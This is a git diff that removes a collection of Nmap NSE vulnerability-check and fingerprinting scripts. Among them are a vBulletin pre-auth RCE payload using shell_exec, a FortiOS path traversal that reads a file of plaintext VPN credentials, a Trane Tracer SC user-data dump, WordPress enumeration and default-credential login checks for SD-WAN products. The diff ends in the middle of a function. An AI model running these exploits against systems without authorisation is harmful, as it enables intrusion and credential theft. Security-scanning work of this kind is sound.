Disclosure date: 2019-09-23 --- | References: --- | https://seclists.org/fulldisclosure/2019/Sep/31 --- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759 --- --- @args http-vuln-cve2019-16759.path The default URL path to request. The default is "/". - -author = "r00tpgp" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = { "vuln" } - -portrule = shortport.http - -action = function(host, port) - local vuln = { - title = "vBulletin 5.x 0day pre-auth RCE exploit", - state = vulns.STATE.NOT_VULN, - description = [[ -vBulletin 5.x 0day pre-auth RCE exploit -This should work on all versions from 5.0.0 till 5.5.4 - ]], - IDS = { - CVE = "CVE-2019-16759" - }, - references = { - 'https://seclists.org/fulldisclosure/2019/Sep/31', - 'https://nvd.nist.gov/vuln/detail/CVE-2019-16759', - }, - dates = { - disclosure = { year = '2019', month = '09', day = '23' } - } - } - - local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) - - local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "POST" - local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/index.php?routestring=ajax/render/widget_php" - - local body = { - ["widgetConfig[code]"] = "echo shell_exec(\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\');exit;", - } - - local options = { - header = { - Connection = "close", - ["Content-Type"] = "application/x-www-form-urlencoded", - ["User-Agent"] = "curl/7.65.3", - ["Accept"] = "*/*", - }, - content = body -} - local response = http.post(host, port, path, nil, nil, body) - - if response and string.match(response.body, "h4x0000r") then - vuln.state = vulns.STATE.VULN - end - - return vuln_report:make_output(vuln) -end diff --git a/nmap_scripts/http-vuln-cve2016-0870.nse b/nmap_scripts/http-vuln-cve2016-0870.nse deleted file mode 100644 index c92d6e2..0000000 --- a/nmap_scripts/http-vuln-cve2016-0870.nse +++ /dev/null @@ -1,180 +0,0 @@ -local nmap = require "nmap" -local http = require "http" -local stdnse = require "stdnse" -local string = require "string" -local shortport = require "shortport" -local table = require "table" - -description = [[ -Trane Tracer SC is an intelligent field panel for communicating with HVAC equipment controllers. According to Trane U.S. Inc., Tracer SC is deployed across several sectors including Commercial Facilities and others. - -Contents of specific directories on the Tracer SC are exposed with the web server application to unauthenticated users. These directories have sensitive information within the configuration files. - -Valid on Trane Tracer SC version 4.20.1134 and below. Tested on 7/3/17. - -$ git clone https://github.com/hkm/nmap-nse-scripts.git - -References: -* https://ics-cert.us-cert.gov/advisories/ICSA-16-259-03 -* http://www.cvedetails.com/cve/CVE-2016-0870/ -* http://websec.mx - -]] - ---- --- @usage nmap -p80 --script http-vuln-cve2016-0870.nse --- --- @output --- | trane-info: --- | serverName: TracerSC --- | serverTime: 2017-07-03T21:01:02-04:00 --- | serverBootTime: 2017-06-25T03:14:38-04:00 --- | vendorName: Trane --- | productName: Tracer SC --- | productVersion: v4.40.1211 (release) --- | kernelVersion: 2.6.30_HwVer12AB-hydra --- | hardwareType: HwVer12AB --- | hardwareSerialNumber: E15A##### --- | 1:equipmentUri: /equipment/generic/generic/## --- | 1:displayName: BOILER ROOMS --- | 1:deviceName: BOILER ROOMS --- | 1:equipmentFamily: Generic --- | 1:roleDocument: BOILER_ROOMS --- | 1:isOffline: false --- | 2:equipmentUri: /equipment/generic/generic/## --- | 2:displayName: BOILER ROOMS --- | 2:deviceName: BOILER ROOMS --- | 2:equipmentFamily: Generic --- | 2:roleDocument: BOILER_ROOMS --- | 2:isOffline: false --- | 3:equipmentUri: /equipment/generic/generic/## --- | 3:displayName: EXHAUSTS 3 RM-6 --- | 3:deviceName: EXHAUSTS 3 RM-6 --- | 3:equipmentFamily: Generic --- | 3:roleDocument: EXHAUSTS_3_RM-6 --- | 3:isOffline: false --- --- @xmloutput --- TracerSC --- 2017-07-03T21:01:02-04:00 --- 2017-06-25T03:14:38-04:00 --- Trane --- Tracer SC --- v4.40.1211 (release) --- -- 2.6.30_HwVer12AB-hydra --- HwVer12AB --- E15A##### --- /equipment/generic/generic/## --- BOILER ROOMS --- BOILER ROOMS --- Generic --- BOILER_ROOMS --- false --- /equipment/generic/generic/## --- BOILER ROOMS --- BOILER ROOMS --- Generic --- BOILER_ROOMS --- false --- /equipment/generic/generic/## --- EXHAUSTS 3 RM-6 --- EXHAUSTS 3 RM-6 --- Generic --- EXHAUSTS_3_RM-6 --- false ---- - -author = "Pedro Joaquin " -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"vuln", "safe"} - -portrule = shortport.portnumber({80}) - -local output = stdnse.output_table() -local outputcol = "\nuserId, firstName, lastName, phoneNo, email, administrator, active,\n" - -local count = 1 - -local function GetUserInfo(host, port, usernumber) - --Get information from /evox/user/user/#usernumber# - local uri = '/evox/user/user/'..usernumber - local response = http.get(host, port, uri) - if response['status-line'] and response['status-line']:match("200") then - --Verify response and parsing of XML /evox/user/user/#usernumber# - local xmlparsetest = response['body']:match('userId') - if not xmlparsetest then - stdnse.debug1("Problem with XML parsing. No users found in /evox/user/user") - return nil, "Problem with XML parsing. No users found in /evox/user/user" - end - if response['status-line'] and response['status-line']:match("401") then - stdnse.debug1("401 Unauthorized") - return nil, "401 Unauthorized" - end - - local keylist = {"userId","firstName","lastName","phoneNo","email", "administrator","active"} - for _,key in ipairs(keylist) do - stdnse.debug1("Looking for : "..key) - output[count..":"..key] = response['body']:match(key..'" val=([^<]*) />') - output[count..":"..key] = string.gsub(output[count..":"..key],'"',"") - outputcol = outputcol..output[count..":"..key]..', ' - stdnse.debug1("Found : "..output[count..":"..key]) - end - count = count + 1 - outputcol = outputcol .. '\n' -end -end - -local function GetInformation(host, port) - - --Get information from /evox/user/user - local uri = '/evox/user/user' - local response = http.get(host, port, uri) - if response['status-line'] and response['status-line']:match("200") then - --Verify response and parsing of XML from /evox/user/user - local xmlparsetest = response['body']:match(' --- --- @output --- PORT STATE SERVICE REASON --- 10443/tcp open ssl/http Fortinet SSL VPN --- | CVE-2018-13379: --- | VULNERABLE: --- | FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure --- | State: VULNERABLE (Exploitable) --- | IDs: CVE-2018-13379 --- | Description: --- | Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow --- | an unauthenticated attacker to download FortiOS system files. --- | --- | FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script --- | will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). --- | This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). --- | --- | Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_). --- | Disclosure date: 24-05-2019 --- | References: --- | https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf --- |_ https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html --- --- @xmloutput --- --- FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure --- VULNERABLE ---

--- FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_). ---

--- ---

--- 05 --- 24 --- 2019 ---

--- --- 2019-05-24 --- --- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html --- https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf ---

--- ---- - -author = {"Asahel Hernandez (Blazz3) "} -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"vuln","safe"} - -portrule = shortport.http - -action = function(host, port) -local vuln = { - title = 'FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure', - state = vulns.STATE.NOT_VULN, -- default - description = [[ - Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow - an unauthenticated attacker to download FortiOS system files. - - FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script - will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). - This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). - - Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_). - ]], - IDS = {CVE = 'CVE-2018-13379'}, - references = { - 'https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf', - 'https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html' - }, - dates = { - disclosure = {year = '2019', month = '05', day = '24'}, - }, -} -local report = vulns.Report:new(SCRIPT_NAME, host, port) -local path = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -local response = http.get(host, port, tostring(path)) -local body = response.body ---local fbody = body:gsub("%z", ".") ---stdnse.debug1("Body: %s", fbody) - -if response.status == 200 and http.response_contains(response, "var fgt_lang =") then - stdnse.debug1("Vulnerable!") - vuln.state = vulns.STATE.VULN - local extra_info = body:gsub("[^\x20-\x7E]", ".") - local extra_info2 = extra_info:gsub("%.+", "\n") - - local f = "" - local t = {} - for i in extra_info2:gmatch("%w+") do - t[#t + 1] = i - end - - for k,v in ipairs(t) do - if string.len(v) > 5 then - if not (string.match(v, "Soprema") and string.match(v, "WebSSLSoprema")) then - f = f..v.."\n" - end - end - end - vuln.extra_info = "Snippet from configuration file:\n"..f -else - vuln.state = vulns.STATE.NOT_VULN - stdnse.debug1("Not Vulnerable...") -end - -return report:make_output(vuln) -end \ No newline at end of file diff --git a/nmap_scripts/http-wordpress-attachment.nse b/nmap_scripts/http-wordpress-attachment.nse deleted file mode 100644 index 08deba7..0000000 --- a/nmap_scripts/http-wordpress-attachment.nse +++ /dev/null @@ -1,141 +0,0 @@ -local http = require "http" -local io = require "io" -local nmap = require "nmap" -local shortport = require "shortport" -local stdnse = require "stdnse" -local string = require "string" - -description = [[ -Enumerates URLs of uploaded media and pages in Wordpress blog/CMS installations by exploiting an information disclosure vulnerability. - -$ git clone https://github.com/hkm/nmap-nse-scripts.git - -Original advisory: -* http://blog.whitehatsec.com/information-leakage-in-wordpress/#.Ueig9m0_yms -]] - ---- --- @usage --- nmap -p80 --script http-wordpress-attachment --- nmap -sV --script http-wordpress-attachment --script-args limit=1000 --- --- @output --- PORT STATE SERVICE --- 80/tcp open http --- | http-wordpress-attachment: --- | URL: http://www.hakim.ws/calendario/ --- | URL: http://www.hakim.ws/2010/12/noticias-anteriores-al-201/ --- |_Search stopped at ID #25. Increase the upper limit if necessary with '--script-args limit=1000' --- --- @args http-wordpress-attachment.limit Upper limit for ID search. Default: 100 --- @args http-wordpress-attachment.basepath Base path to Wordpress. Default: / --- @args http-wordpress-attachment.out If set it saves the URL list in this file. ---- - -author = "Pedro Joaquin based on Paulino Calderon http-wordpress-enum" -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" -categories = {"auth", "intrusive", "vuln"} - - -portrule = shortport.http - ---- --- Returns the URL extracted from the Location corresponding to the attachment_id passed --- If attachment_id doesn't exists returns false --- @param host Host table --- @param port Port table --- @param path Base path to WP --- @param id Attachment id --- @return false if not found otherwise it returns the username ---- -local function get_wp_url(host, port, path, id) - stdnse.print_debug(2, "%s: Trying to get URL with attachment_id %s", SCRIPT_NAME, id) - local req = http.get(host, port, path.."?attachment_id="..id, {no_cache = true, redirect_ok = false}) - if req.status == 301 then - if string.find(req.header.location, "attachment_id") == nil then - stdnse.print_debug(1, "Attachment_id #%s returned %s", id, req.header.location) - return req.header.location - end - end - return false -end - ---- ---Returns true if WP installation exists. ---We assume an installation exists if wp-content is found in body of index.php ---@param host Host table ---@param port Port table ---@param path Path to WP ---@return True if 404 page contains string wp-content --- -local function check_wp(host, port, path) - stdnse.print_debug(2, "Checking wp-content in body") - local req = http.get(host, port, path..math.random(1, 99999999), {no_cache = true}) - if req.status == 404 then - if string.find(tostring(req.body), "wp%-content") ~= nil then - stdnse.print_debug(1, "Wordpress installation detected. String wp-content found in 404 body") - return true - end - end - return false -end - ---- ---Writes string to file ---Taken from: hostmap.nse ---@param filename Target filename ---@param contents String to save ---@return true when successful -local function write_file(filename, contents) - local f, err = io.open(filename, "w") - if not f then - return f, err - end - f:write(contents) - f:close() - return true -end - - ---- ---MAIN ---- -action = function(host, port) - local basepath = stdnse.get_script_args("http-wordpress-attachment.basepath") or "/" - local limit = stdnse.get_script_args("http-wordpress-attachment.limit") or 100 - local filewrite = stdnse.get_script_args("http-wordpress-attachment.out") - local output = {""} - local users = {} - - --First, we check this is WP - if not(check_wp(host, port, basepath)) then - if nmap.verbosity() >= 2 then - return "[Error] Wordpress installation was not found. We couldn't find wp-content" - else - return - end - end - - --Incrementing ids to enum URLs - for i=1, tonumber(limit) do - local user = get_wp_url(host, port, basepath, i) - if user then - output[#output+1] = string.format("URL: %s", user) - users[#users+1] = user - end - end - - if filewrite and #users>0 then - local status, err = write_file(filewrite, stdnse.strjoin("\n", users)) - if status then - output[#output+1] = string.format("URLs saved to %s\n", filewrite) - else - output[#output+1] = string.format("Error saving %s: %s\n", filewrite, err) - end - end - - if #output > 1 then - output[#output+1] = string.format("Search stopped at ID #%s. Increase the upper limit if necessary with 'http-wordpress-attachment.limit'", limit) - return stdnse.strjoin("\n", output) - end -end diff --git a/nmap_scripts/httpframe.nse b/nmap_scripts/httpframe.nse deleted file mode 100644 index e02f3f4..0000000 --- a/nmap_scripts/httpframe.nse +++ /dev/null @@ -1,115 +0,0 @@ -local http = require "http" -local shortport = require "shortport" -local stdnse = require "stdnse" -local string = require "string" - -description = [[ -Stores the results of an HTTP(S) scan on a HTML page with JQuery. Shows IP, header, -realm and tries to identify if target is a router, camera or common web server. - -Almacena los resultados de un barrido HTTP(S) en una página web con Frames y JQuery. -Muestra las direcciones IP, un mirror del contenido html, el contenido de la cabecera -www-authenticate. De acuerdo al header server o al contenido de la página que obtiene -muestra si es un router, cámara o firewall. - -$ git clone https://github.com/hkm/nmap-nse-scripts.git - -]] -author = {'Pedro Joaquin pjoaquin()websec.mx'} -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" -categories = {"discovery"} - -portrule = shortport.port_or_service({80, 443}, - {"http", "https"}) - -local function categoria(server) - local modemlist = {'Router', 'Modem','RomPager', 'DSL', 'Mbedthis','Mathopd','GoAhead','IOS','httpd','siyou server','lighttpd','login.lp','ADTRAN','Technicolor','url_filter_hint.asp','RouterOS'} - for i=1, #modemlist do - if string.find(server, modemlist[i]) then return "Router" end - end - - local camlist = {'dcs-lig-httpd', 'Camera', 'Avtech', 'Hikvision', 'iCanWebServer', 'Boa', 'AV-TECH','Cross Web Server','DCS-','netcam'} - for i=1, #camlist do - if string.find(server, camlist[i]) then return "Camera" end - end - - local serverlist = {'Apache', 'IIS'} - for i=1, #serverlist do - if string.find(server, serverlist[i]) then return "Server" end - end - - return "Unknown" -end - -local function siexiste(var1) - if var1 == nil then - return "" - else - return var1 - end -end - -local function savefile(name, content, mode) - local file, err = io.open(name, mode) - if ( file ) then - file:write(content) - file:close() - else - return "\n ERROR: " .. file - end -end - -savefile('httpframe_log.html', 'httpframe.nse v0.5', 'w') -savefile("httpframe_log/menu.htm", '','w') - -savefile("httpframe_log/menu.htm", ''.. - ''.. - ''.. - ''.. - '', 'a+') - -savefile("httpframe_log/menu.htm", '','a+') - -action = function(host, port) - - local query = http.get(host.ip, port, "/") - - local serverstring = " " - - if query.header['server'] ~= nil then serverstring = query.header['server'] end - if query.header['www-authenticate'] ~= nil then serverstring = serverstring .. query.header['www-authenticate'] end - if query.body ~= nil then savefile("httpframe_log/" .. host.ip .. ".html", query.body, 'w') end - - if query.status == 302 then - serverstring = serverstring .. query.header['location'] - savefile("httpframe_log/" .. host.ip .. ".html", "Location: "..query.header['location'], 'w') - end - -if query.body ~= nil then - if string.find(query.body, ".location") then - serverstring=serverstring..query.body - query.body="" - savefile("httpframe_log/" .. host.ip .. ".html", query.body, 'w') - end -end - -if port.service == "https" then - savefile("httpframe_log/menu.htm", '', 'a+') -else - savefile("httpframe_log/menu.htm", '', 'a+') -end - - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - - return "Information added to httpframe_log.html " -end diff --git a/nmap_scripts/infiltrator.nse b/nmap_scripts/infiltrator.nse deleted file mode 100644 index 5bab27f..0000000 --- a/nmap_scripts/infiltrator.nse +++ /dev/null @@ -1,1225 +0,0 @@ -local comm = require "comm" -local string = require "string" -local table = require "table" -local shortport = require "shortport" -local nmap = require "nmap" -local stdnse = require "stdnse" -local U = require "lpeg-utility" -local http = require "http" -local snmp = require "snmp" -local sslcert = require "sslcert" -local tls = require "tls" -local url = require "url" -local json = require "json" - -description = [[ -Search SD-WAN products from SDWAN NewHope research project database by -- server name -- http titles -- snmp descriptions -- ssl certificates - -The search database is based on census.md document with SD-WAN products search queries. -Also this script is based on: -- http-server-header NSE script by Daniel Miller -- http-title NSE script by Diman Todorov -- snmp-sysdescr NSE script by Thomas Buchanan -- ssl-cert NSE script by David Fifield - -Installation -$ git clone https://github.com/sdnewhop/sdwan-infiltrator -$ cd /sdwan-infiltrator/ -$ sudo cp * /usr/share/nmap/scripts/ -$ sudo nmap --script infiltrator --script-args infiltrator.version=true -sS -sU -p U:161,T:80,443,8008,8080,8443 or -iL -]] - - --- --- @usage --- nmap --script=infiltrator.nse -sS -sU -p U:161,T:80,443,8008,8080,8443 or -iL --- --- @output --- | infiltrator: --- | status: success --- | method: server --- | product: --- | host_addr: ... --- | host_port: 443 --- |_ version: ... --- ... --- | infiltrator: --- | status: success --- | method: title --- | product: --- | host_addr: ... --- | host_port: 443 --- |_ version: ... --- ... --- | infiltrator: --- | status: success --- | method: snmp --- | product: --- | host_addr: ... --- | host_port: 161 --- |_ version: ... --- ... --- | infiltrator: --- | status: success --- | method: SSL certificate --- | product: --- | host_addr: ... --- | host_port: 443 --- |_ version: ... - - -author = "sdnewhop" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"default", "discovery", "safe"} - - -portrule = shortport.portnumber({80, 161, 443, 8008, 8080, 8443}, {"tcp", "udp"}, {"open"}) - -SDWANS_BY_SSL_TABLE = { - ["Cisco SD-WAN"] = {"Viptela Inc"}, - ["Versa Analytics"] = {"versa%-analytics"}, - ["Versa Director"] = {"director%-1", "versa%-director"}, - ["Riverbed SteelHead"] = {"Riverbed Technology"}, - ["Silver Peak Unity Orchestrator"] = {"Silverpeak GMS"}, - ["Silver Peak Unity EdgeConnect"] = {"silver%-peak", "Silver Peak Systems Inc"}, - ["CloudGenix SD-WAN"] = {"CloudGenix Inc."}, - ["Talari SD-WAN"] = {"Talari", "Talari Networks"}, - ["InfoVista SALSA"] = {"SALSA Portal"}, - ["Barracuda CloudGen Firewall"] = {"Barracuda CloudGen Firewall", "Barracuda Networks"}, - ["Viprinet Virtual VPN Hub"] = {"Viprinet"}, - ["Citrix Netscaler SD-WAN"] = {"Citrix Systems"}, - ["Fortinet FortiGate SD-WAN"] = {"FGT%-", "FortiGate"} -} - -SDWANS_BY_SNMP_TABLE = { - ["Fatpipe SYMPHONY SD-WAN"] = {"Linux Fatpipe"}, - ["Versa Analytics"] = {"Linux versa%-analytics"}, - ["Juniper Networks Contrail SD-WAN"] = {"Juniper Networks, Inc. srx"}, - ["Aryaka Network Access Point"] = {"Aryaka Networks Access Point"}, - ["Arista Networks EOS"] = {"Arista Networks EOS"}, - ["Viprinet Virtual VPN Hub"]= {"Viprinet VPN Router"} -} - -SDWANS_BY_TITLE_TABLE = { - ["VMWare NSX SD-WAN"] = {"VeloCloud", "VeloCloud Orchestrator"}, - ["TELoIP VINO SD-WAN"] = {"Teloip Orchestrator API"}, - ["Fatpipe SYMPHONY SD-WAN"] = {"WARP"}, - ["Cisco SD-WAN"] = {"Viptela vManage", "Cisco vManage"}, - ["Versa Flex VNF"] = {"Flex VNF"}, - ["Versa Director"] = {"Versa Director Login"}, - ["Riverbed SteelConnect"] = {"SteelConnect Manager", "Riverbed AWS Appliance"}, - ["Riverbed SteelHead"] = {"amnesiac Sign in"}, - ["Citrix NetScaler SD-WAN VPX"] = {"Citrix NetScaler SD%-WAN %- Login"}, - ["Citrix NetScaler SD-WAN Center"] = {"SD%-WAN Center | Login"}, - ["Citrix Netscaler SD-WAN"] = {"DC | Login"}, - ["Silver Peak Unity Orchestrator"] = {"Welcome to Unity Orchestrator"}, - ["Silver Peak Unity EdgeConnect"] = {"Silver Peak Appliance Management Console"}, - ["Ecessa WANworX SD-WAN"] = {"Ecessa"}, - ["Nuage Networks SD-WAN (VNS)"] = {"SD%-WAN Portal", "Architect", "VNS portal"}, - ["Juniper Networks Contrail SD-WAN"] = {"Log In %- Juniper Networks Web Management"}, - ["Talari SD-WAN"] = {"AWS"}, - ["Aryaka Network Access Point"] = {"Aryaka Networks", "Aryaka, Welcome"}, - ["InfoVista SALSA"] = {"SALSA Login"}, - ["Huawei SD-WAN"] = {"Agile Controller"}, - ["Sonus SBC Management Application"] = {"SBC Management Application"}, - ["Sonus SBC Edge"] = {"Sonus SBC Edge Web Interface"}, - ["Arista Networks EOS"] = {"Arista Networks EOS"}, - ["128 Technology Networking Platform"] = {"128T Networking Platform"}, - ["Gluware Control"] = {"Gluware Control"}, - ["Barracuda CloudGen Firewall"] = {"Barracuda CloudGen Firewall"}, - ["Viprinet Virtual VPN Hub"] = {"Viprinet %- AdminDesk %- Login"}, - ["Viprinet Traffic Tools"] = {"Viprinet traffic tools"}, - ["Cradlepoint SD-WAN"] = {"Login :: CR4250%-PoE", "Login :: AER2200%-600M"}, - ["Brain4Net Orchestrator"] = {"B4N ORC"}, - ["Fortinet FortiManager"] = {"FortiManager%-VM64"} - } - -SDWANS_BY_SERVER_TABLE = { - ["Versa Director"] = {"Versa Director"}, - ["Versa Analytics"] = {"Versa%-Analytics%-Server"}, - ["Barracuda CloudGen Firewall"] = {"Barracuda CloudGen Firewall"}, - ["Viprinet Virtual VPN Hub"] = {"ViprinetHubReplacement", "Viprinet"} - } - -------------------------------------------------------------------------------- --- version gathering block -------------------------------------------------------------------------------- - -local function vbrain(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/api/version" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - - found, matches = http.response_contains(response, '0;url%=(.*)"%/%>') - - if found == true then - local urltmp = url.parse(matches[1]) - urlp = urltmp.path - response = http.generic_request(host, port, "GET", urlp) - try_counter = 1 - end - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, '"build":"(.+)",', false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Brain4Net Orchestrator Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) -end - -local function vcradlepoint(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/login/?referer=/admin/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - found, matches = http.response_contains(response, "([0-9.]+[0-9]) .[a-zA-Z]+.[a-zA-Z]+.[0-9]+.[0-9]+:[0-9]+:[0-9]+", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Cradlepoint App Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) -end - -local function vcitrix(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - response = http.generic_request(host, port, "GET", path) - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - -- stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - while try_counter < 30 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - found, matches = http.response_contains(response, "css%?v%=([.0-9]+)", false) - if found == true then vsdwan = matches[1] else return nil end - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Citrix NetScaler Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vfatpipe(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, "

([r.0-9]+)

", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Fatpipe Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vnuage(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, 'ng%-version="([.0-9]+)"', false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Nuage Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vriverbed(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, "web3 v([.0-9]+)", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Riverbed Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vsilverpeak(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - if response.status == 302 then - - found, matches = http.response_contains(response, "http.*/([.0-9]+)/", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "SilverPeak Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - -local function vsilverpeak_login(host, port) - local output_info = {} - output_info.login = {} - local monitor_check = "/rest/json/login?user=monitor&password=monitor" - local admin_check = "/rest/json/login?user=admin&password=admin" - - local resp_monitor = http.get(host, port, monitor_check) - if not resp_monitor.status then - -- force check on 80 port if empty response from 443 (by default) - resp_monitor = http.get(host, 80, monitor_check) - end - if resp_monitor.status == 200 then - table.insert(output_info.login, "Authentication successful (monitor:monitor)") - end - - local resp_admin = http.get(host, port, admin_check) - if not resp_admin.status then - -- force check on 80 port if empty response from 443 (by default) - resp_admin = http.get(host, 80, admin_check) - end - if resp_admin.status == 200 then - table.insert(output_info.login, "Authentication successful (admin:admin)") - end - - if next(output_info.login) ~= nil then - return output_info, stdnse.format_output(true, output_info) - end -end - - -local function vsonus_edge(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/cgi/index.php" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = 